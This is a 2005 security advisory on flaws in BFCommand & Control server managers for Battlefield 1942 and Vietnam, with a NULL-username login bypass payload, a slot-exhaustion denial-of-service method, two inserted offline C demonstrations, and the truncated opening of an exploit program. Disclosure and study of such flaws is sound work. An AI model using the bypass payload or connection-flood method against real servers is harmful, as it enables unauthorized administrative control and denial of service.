Tuesday, August 30, 2005

[NT] BFCommand and Control, Battlefield 1942 and BFVietnam Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

BFCommand and Control, Battlefield 1942 and BFVietnam Multiple
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

<http://www.bfcommandcontrol.org/> BFCommand & Control Server Manager is
a server manager available for the games Battlefield 1942 (under the name
BFCC), Battlefield Vietnam (BFVCC) and Battlefield 2 (BF2CC).
What sets these server managers apart from the others available on the
Internet is that BFVCC also ships directly on the Battlefield Vietnam CD,
so it is used on many servers.

Lack of proper input validation and flawed connection management allow
attackers to perform multiple types of attacks on the BFCommand and Control
server managers for Battlefield 1942 and Battlefield Vietnam.

DETAILS

Vulnerable Systems:
* BFCC version 1.22_A and lower
* BFVCC version 2.14_B and lower

Immune Systems:
* BFVCCDaemon any version

Full anonymous login bypass:
An anonymous user can bypass the login mechanism and gain full
administration privileges.
Because the login mechanism is never used, the attacker also bypasses the
logging engine, except for several commands that are logged whenever they
are used.

Login bypass through NULL username:
The "login" command is normally composed of a username and a password, but
if attackers place a NULL byte (0x00) in the username field they are able
to bypass the authentication and the server grants them access.

Proof of Concept (fields are separated by 0x1e; the message ends with the
four-byte delimiter):
"login" "\x1e" // command
"\0" "\x1e" // username (NULL byte)
"none" "\x1e" // password
"none" "\x1e" // username
"" "\x1e" // ???
"" // ???
"\x00\x40\x40\x00" // command delimiter
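The following program is an example added to this page; it is not part of the advisory and not Luigi Auriemma's bfccown.c or any BFCC code. It builds the NULL-username "login" message byte for byte as the proof of concept lays it out, then splits it back into fields the way a server would, so that the difference between the raw one-byte username and what a strlen()/strcmp()-based parser sees becomes visible. Everything it assumes (fields separated by 0x1e, the "\x00\x40\x40\x00" end marker, the field order) is taken from the PoC above; why the real server accepts the NUL username is not stated by the advisory, and the program does not claim to know. It sends no traffic.

```c
/* Added example (not Luigi Auriemma's bfccown.c and not BFCC code): builds the
 * NULL-username "login" message exactly as the proof of concept lays it out and
 * splits it back into fields the way a server would.  Assumptions: fields are
 * separated by 0x1e and the message ends with "\x00\x40\x40\x00", both taken
 * from the PoC; nothing here touches the network. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FIELD_SEP 0x1e
static const uint8_t MSG_END[4] = { 0x00, 0x40, 0x40, 0x00 };

/* Append len bytes of src to buf at *pos; returns 0 if buf would overflow. */
static int put(uint8_t *buf, size_t cap, size_t *pos, const void *src, size_t len)
{
    if (*pos + len > cap) return 0;
    memcpy(buf + *pos, src, len);
    *pos += len;
    return 1;
}

/* Append one field plus the 0x1e separator.  The field carries an explicit
 * length so an embedded NUL survives; strlen() would silently drop it. */
static int put_field(uint8_t *buf, size_t cap, size_t *pos, const void *f, size_t len)
{
    uint8_t sep = FIELD_SEP;
    return put(buf, cap, pos, f, len) && put(buf, cap, pos, &sep, 1);
}

/* Build the PoC login message.  Returns its length, or 0 on overflow. */
size_t build_null_login(uint8_t *buf, size_t cap)
{
    size_t pos = 0;
    int ok = put_field(buf, cap, &pos, "login", 5)
          && put_field(buf, cap, &pos, "\0", 1)     /* username: one NUL byte */
          && put_field(buf, cap, &pos, "none", 4)   /* password */
          && put_field(buf, cap, &pos, "none", 4)   /* username, as in the PoC */
          && put_field(buf, cap, &pos, "", 0)       /* unknown field */
          && put(buf, cap, &pos, MSG_END, sizeof MSG_END); /* last empty field + end marker */
    return ok ? pos : 0;
}

/* Split msg into raw fields on 0x1e, ignoring the trailing end marker.
 * Returns the field count; lens[i] is the raw byte length of field i. */
int split_fields(const uint8_t *msg, size_t len,
                 const uint8_t *starts[], size_t lens[], int max)
{
    size_t body = len, start = 0;
    int n = 0;
    if (len >= 4 && memcmp(msg + len - 4, MSG_END, 4) == 0) body = len - 4;
    for (size_t i = 0; i <= body; i++) {
        if (i == body || msg[i] == FIELD_SEP) {
            if (n == max) return n;
            starts[n] = msg + start;
            lens[n] = i - start;
            n++;
            start = i + 1;
        }
    }
    return n;
}

/* What a strlen()/strcmp()-based parser sees: the field up to its first NUL.
 * For the PoC username this is 0 although the raw field is one byte long. */
size_t cstring_view_len(const uint8_t *f, size_t len)
{
    size_t i = 0;
    while (i < len && f[i] != 0) i++;
    return i;
}

/* The check a server should apply before looking the name up: use the raw
 * length and reject empty names or any control byte (0x00-0x1f) in the field. */
int username_is_acceptable(const uint8_t *f, size_t len)
{
    if (len == 0) return 0;
    for (size_t i = 0; i < len; i++)
        if (f[i] < 0x20) return 0;
    return 1;
}

int main(void)
{
    uint8_t buf[64];
    const uint8_t *starts[8];
    size_t lens[8];
    size_t n = build_null_login(buf, sizeof buf);
    int k = split_fields(buf, n, starts, lens, 8);

    printf("message (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", buf[i]);
    printf("\n%d fields\n", k);
    for (int i = 0; i < k; i++)
        printf("field %d: raw len %zu, C-string len %zu, acceptable=%d\n",
               i, lens[i], cstring_view_len(starts[i], lens[i]),
               username_is_acceptable(starts[i], lens[i]));
    return 0;
}
```

The username field is the point of the exercise: the raw field has length 1, the C-string view has length 0, and any comparison done through NUL-terminated string functions is comparing against an empty name. A server-side check that works on the raw field length and rejects control bytes, as username_is_acceptable() does, closes that gap regardless of which string routine the lookup uses.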

Invulnerable clients and full privileges:
The administrator (and even more so the local administrator) has the ability
to boot the other remote administrators.
Commands such as "Boot" and others that have an effect on the clients are
ignored by the server, which simply keeps the connection open; any operation
or disconnection is performed by the client, not the server.
In short, a modified client (for example one in which the Unicode "Boot"
command string in the executable has been overwritten with a NULL byte)
cannot be booted.
Furthermore, each administrator can be limited in what he or she can do by
setting permissions in the "User Profiles" section.
Just like the Boot command, these permissions are also enforced client-side,
so an administrator with very restricted rights can take full control of
the server manager.

Server full after consecutive connections:
This is a sort of "fake players" attack, with the difference that here,
after 20 consecutive connections (a simple connect and disconnect is enough),
the server becomes full forever.
In short, if the client does not send the "login" command the server
considers the connection idle, and when the limit of 20 connections is
reached (even though the connections and the sockets have already been
closed!) it becomes full and nobody can use the server manager remotely.
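The following program is an example added to this page, not BFCC's code and not part of the advisory. It models the connection accounting the paragraph above describes with a 20-slot session table: in the vulnerable configuration a slot is released only by a client-driven disconnect, never when the peer's socket closes, so twenty connect-and-close cycles with no "login" leave the table full; in the fixed configuration the socket close releases the slot. The slot limit of 20 comes from the advisory; the internal layout of the table and the assumption that disconnection is purely client-driven (consistent with the "Invulnerable clients" section) are the example's own.

```c
/* Added example (not BFCC's code): a model of the connection accounting the
 * advisory describes.  Assumptions: the server keeps at most MAX_CONNS (20,
 * per the advisory) sessions; in the vulnerable build a slot is released
 * only by a client-sent disconnect, never when the socket closes, so a peer
 * that connects, never logs in and just closes the socket leaks the slot. */
#include <stdio.h>
#include <string.h>

#define MAX_CONNS 20

typedef struct {
    int in_use;     /* slot holds a session */
    int logged_in;  /* "login" was received on this session */
    int fd;         /* socket descriptor; plain integers in this model */
} session_t;

typedef struct {
    session_t s[MAX_CONNS];
    int release_on_close;  /* 0: vulnerable behaviour, 1: fixed behaviour */
} server_t;

void server_init(server_t *sv, int release_on_close)
{
    memset(sv, 0, sizeof *sv);
    sv->release_on_close = release_on_close;
}

/* Accept a new peer: returns the slot index, or -1 when the server is "full". */
int server_accept(server_t *sv, int fd)
{
    for (int i = 0; i < MAX_CONNS; i++) {
        if (!sv->s[i].in_use) {
            sv->s[i].in_use = 1;
            sv->s[i].logged_in = 0;
            sv->s[i].fd = fd;
            return i;
        }
    }
    return -1;
}

static session_t *find_session(server_t *sv, int fd)
{
    for (int i = 0; i < MAX_CONNS; i++)
        if (sv->s[i].in_use && sv->s[i].fd == fd) return &sv->s[i];
    return NULL;
}

void server_login(server_t *sv, int fd)
{
    session_t *s = find_session(sv, fd);
    if (s) s->logged_in = 1;
}

/* Client-sent disconnect: the only path that frees a slot in the vulnerable build. */
void server_client_disconnect(server_t *sv, int fd)
{
    session_t *s = find_session(sv, fd);
    if (s) s->in_use = 0;
}

/* The peer closed the socket (FIN/RST) without sending any command.  The fixed
 * build frees the slot here; the vulnerable one keeps it as an "idle" session. */
void server_socket_closed(server_t *sv, int fd)
{
    session_t *s = find_session(sv, fd);
    if (s && sv->release_on_close) s->in_use = 0;
}

int server_free_slots(const server_t *sv)
{
    int n = 0;
    for (int i = 0; i < MAX_CONNS; i++) if (!sv->s[i].in_use) n++;
    return n;
}

/* n connect-then-close cycles with no "login": returns free slots afterwards. */
int simulate_idle_cycles(server_t *sv, int n)
{
    for (int i = 0; i < n; i++) {
        int fd = 1000 + i;
        if (server_accept(sv, fd) < 0) break;
        server_socket_closed(sv, fd);
    }
    return server_free_slots(sv);
}

int main(void)
{
    server_t vuln, fixed;
    server_init(&vuln, 0);
    server_init(&fixed, 1);
    printf("vulnerable: %d free slots after 20 idle cycles, next accept -> %d\n",
           simulate_idle_cycles(&vuln, 20), server_accept(&vuln, 9999));
    printf("fixed:      %d free slots after 20 idle cycles, next accept -> %d\n",
           simulate_idle_cycles(&fixed, 20), server_accept(&fixed, 9999));
    return 0;
}
```

The fix is the one-line difference in server_socket_closed(): session lifetime must be tied to the socket the server itself observes, not to a command the client may never send. A pre-login idle timeout would close the same hole from the other side.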

Exploit:
winerr.h can be found at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
bfccown.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
